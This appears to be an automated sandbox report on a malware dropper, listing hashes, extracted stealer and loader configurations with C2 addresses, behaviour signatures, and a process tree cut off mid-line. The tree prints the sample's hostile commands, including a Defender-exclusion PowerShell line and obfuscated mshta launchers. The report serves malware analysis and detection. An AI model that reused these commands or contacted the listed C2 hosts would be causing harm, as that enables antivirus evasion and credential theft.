Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

02-12-2021 07:35

211202-je6zgsfge4 10

10-09-2021 20:31

210910-za2rzaaeh3 10

10-09-2021 19:40

210910-ydvmdsdffp 10

10-09-2021 12:06

210910-n9s4bsdbep 10

10-09-2021 05:37

210910-gbjcxahdh2 10

09-09-2021 22:16

210909-17av7aghb7 10

09-09-2021 22:12

210909-14mqksgha9 10

09-09-2021 22:12

210909-14l42sgha8 10

09-09-2021 22:11

210909-14e1qsgha7 10

09-09-2021 22:11

210909-138lnacacn 10

Analysis

  • max time kernel
    55s
  • max time network
    208s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-09-2021 22:11

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Remote task has failed: Machine shutdown
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.3MB

  • MD5

    6d18c8e8ab9051f7a70b89ff7bb0ec35

  • SHA1

    265311e2afd9f59e824f4b77162cf3dfa278eb7e

  • SHA256

    8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d

  • SHA512

    249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff

Score
10/10
redlinesmokeloadersocelarsvidar706pab123aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealerthemidatrojan

Malware Config

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/
rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Executes dropped EXE 49 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 6 IoCs
    evasion
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2760
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2752
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2596
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2484
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1896
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1448
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1316
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1268
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1120
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                          PID:1032
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:68
                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1512
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3916
                              • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:184
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3172
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1912
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2100
                                  • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu219d5fe8cf316.exe
                                    Thu219d5fe8cf316.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3760
                                    • C:\ProgramData\6532093.exe
                                      "C:\ProgramData\6532093.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4728
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 4728 -s 1912
                                        7⤵
                                        • Program crash
                                        PID:7636
                                    • C:\ProgramData\766683.exe
                                      "C:\ProgramData\766683.exe"
                                      6⤵
                                        PID:4812
                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5188
                                      • C:\ProgramData\3067068.exe
                                        "C:\ProgramData\3067068.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:4388
                                      • C:\ProgramData\4620714.exe
                                        "C:\ProgramData\4620714.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4824
                                      • C:\ProgramData\3883238.exe
                                        "C:\ProgramData\3883238.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:5332
                                      • C:\ProgramData\816686.exe
                                        "C:\ProgramData\816686.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:5472
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\ProgramData\816686.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\816686.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                          7⤵
                                            PID:6080
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\816686.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\816686.exe" ) do taskkill /Im "%~NxB" /F
                                              8⤵
                                                PID:4840
                                                • C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE
                                                  GZ9~4QZ~O.EXe -P6_oIH__Ioj5q
                                                  9⤵
                                                    PID:5652
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                                      10⤵
                                                        PID:6460
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F
                                                          11⤵
                                                            PID:6976
                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                          "C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S
                                                          10⤵
                                                            PID:6192
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /Im "816686.exe" /F
                                                          9⤵
                                                          • Kills process with taskkill
                                                          PID:6364
                                                  • C:\ProgramData\4572595.exe
                                                    "C:\ProgramData\4572595.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:5672
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe
                                                4⤵
                                                  PID:3948
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21a1ef054cac78a.exe
                                                    Thu21a1ef054cac78a.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2548
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      6⤵
                                                        PID:4960
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2096
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3600
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21624565bb917a.exe
                                                      Thu21624565bb917a.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:940
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3888
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu2164f292a11ce.exe
                                                      Thu2164f292a11ce.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1952
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe
                                                    4⤵
                                                      PID:1856
                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21b9847cb6727.exe
                                                        Thu21b9847cb6727.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:2104
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe
                                                      4⤵
                                                        PID:2368
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu214ce31cede21.exe
                                                          Thu214ce31cede21.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2376
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Thu214ce31cede21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu214ce31cede21.exe" & del C:\ProgramData\*.dll & exit
                                                            6⤵
                                                              PID:5824
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4812
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im Thu214ce31cede21.exe /f
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:6056
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /t 6
                                                                7⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4420
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone
                                                          4⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3668
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21df5caa1b78de6.exe
                                                            Thu21df5caa1b78de6.exe /mixone
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:3156
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 656
                                                              6⤵
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4604
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 672
                                                              6⤵
                                                              • Program crash
                                                              PID:5516
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 628
                                                              6⤵
                                                              • Program crash
                                                              PID:6028
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 712
                                                              6⤵
                                                              • Program crash
                                                              PID:5812
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 888
                                                              6⤵
                                                              • Program crash
                                                              PID:4180
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 928
                                                              6⤵
                                                              • Program crash
                                                              PID:6988
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 1100
                                                              6⤵
                                                              • Program crash
                                                              PID:6164
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe
                                                          4⤵
                                                            PID:3040
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu2156de5489c19.exe
                                                              Thu2156de5489c19.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:2428
                                                              • C:\Users\Admin\AppData\Local\Temp\tmpABA7_tmp.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\tmpABA7_tmp.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Adds Run key to start application
                                                                PID:6072
                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                  dllhost.exe
                                                                  7⤵
                                                                    PID:4452
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c cmd < Attesa.wmv
                                                                    7⤵
                                                                      PID:4612
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:5320
                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                          findstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv
                                                                          9⤵
                                                                            PID:4680
                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                            Adorarti.exe.com u
                                                                            9⤵
                                                                              PID:7236
                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                10⤵
                                                                                  PID:7844
                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                    11⤵
                                                                                      PID:7380
                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                        12⤵
                                                                                          PID:6224
                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                            13⤵
                                                                                              PID:4840
                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                14⤵
                                                                                                  PID:5264
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                    15⤵
                                                                                                      PID:196
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                        16⤵
                                                                                                          PID:8100
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                            17⤵
                                                                                                            • Adds Run key to start application
                                                                                                            PID:4812
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                              18⤵
                                                                                                                PID:8108
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                  19⤵
                                                                                                                    PID:6924
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                      20⤵
                                                                                                                        PID:7864
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                          21⤵
                                                                                                                            PID:8108
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                              22⤵
                                                                                                                                PID:8316
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                  23⤵
                                                                                                                                    PID:8524
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                      24⤵
                                                                                                                                        PID:8876
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                          25⤵
                                                                                                                                            PID:9160
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                              26⤵
                                                                                                                                                PID:8428
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u
                                                                                                                                                  27⤵
                                                                                                                                                    PID:8692
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping localhost
                                                                                                                9⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:7568
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c Thu21b93295136197.exe
                                                                                                      4⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1680
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21b93295136197.exe
                                                                                                        Thu21b93295136197.exe
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:3164
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0DB9B.tmp\Thu21b93295136197.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0DB9B.tmp\Thu21b93295136197.tmp" /SL5="$50030,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21b93295136197.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:4180
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9H6S0.tmp\Setup.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9H6S0.tmp\Setup.exe" /Verysilent
                                                                                                            7⤵
                                                                                                              PID:5084
                                                                                                              • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                                                "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                8⤵
                                                                                                                  PID:6924
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-QUPGJ.tmp\stats.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-QUPGJ.tmp\stats.tmp" /SL5="$40264,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                    9⤵
                                                                                                                      PID:6240
                                                                                                                  • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                                                                                                    "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                                                                                                    8⤵
                                                                                                                      PID:6860
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BSKR.exe"
                                                                                                                        9⤵
                                                                                                                          PID:1904
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\BSKR.exe
                                                                                                                            10⤵
                                                                                                                              PID:7248
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser144.exe"
                                                                                                                            9⤵
                                                                                                                              PID:8036
                                                                                                                              • C:\ProgramData\2327868.exe
                                                                                                                                "C:\ProgramData\2327868.exe"
                                                                                                                                10⤵
                                                                                                                                  PID:7712
                                                                                                                                • C:\ProgramData\8530402.exe
                                                                                                                                  "C:\ProgramData\8530402.exe"
                                                                                                                                  10⤵
                                                                                                                                    PID:7612
                                                                                                                                  • C:\ProgramData\4105056.exe
                                                                                                                                    "C:\ProgramData\4105056.exe"
                                                                                                                                    10⤵
                                                                                                                                      PID:6340
                                                                                                                                    • C:\ProgramData\6998069.exe
                                                                                                                                      "C:\ProgramData\6998069.exe"
                                                                                                                                      10⤵
                                                                                                                                        PID:7504
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE ( creatEoBjECT ( "wScRiPt.shELl" ). RuN ("CMD /c TypE ""C:\ProgramData\6998069.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\6998069.exe"" ) do taskkill /Im ""%~NxB"" /F " , 0 , tRUe ) )
                                                                                                                                          11⤵
                                                                                                                                            PID:5952
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\6998069.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\6998069.exe" ) do taskkill /Im "%~NxB" /F
                                                                                                                                              12⤵
                                                                                                                                                PID:5608
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /Im "6998069.exe" /F
                                                                                                                                                  13⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:7868
                                                                                                                                          • C:\ProgramData\4183750.exe
                                                                                                                                            "C:\ProgramData\4183750.exe"
                                                                                                                                            10⤵
                                                                                                                                              PID:4172
                                                                                                                                            • C:\ProgramData\4805069.exe
                                                                                                                                              "C:\ProgramData\4805069.exe"
                                                                                                                                              10⤵
                                                                                                                                                PID:7316
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                                                                                                                              9⤵
                                                                                                                                                PID:6384
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "cmd" /c cmd < Cerchia.vsdx
                                                                                                                                                  10⤵
                                                                                                                                                    PID:732
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd
                                                                                                                                                      11⤵
                                                                                                                                                        PID:1512
                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
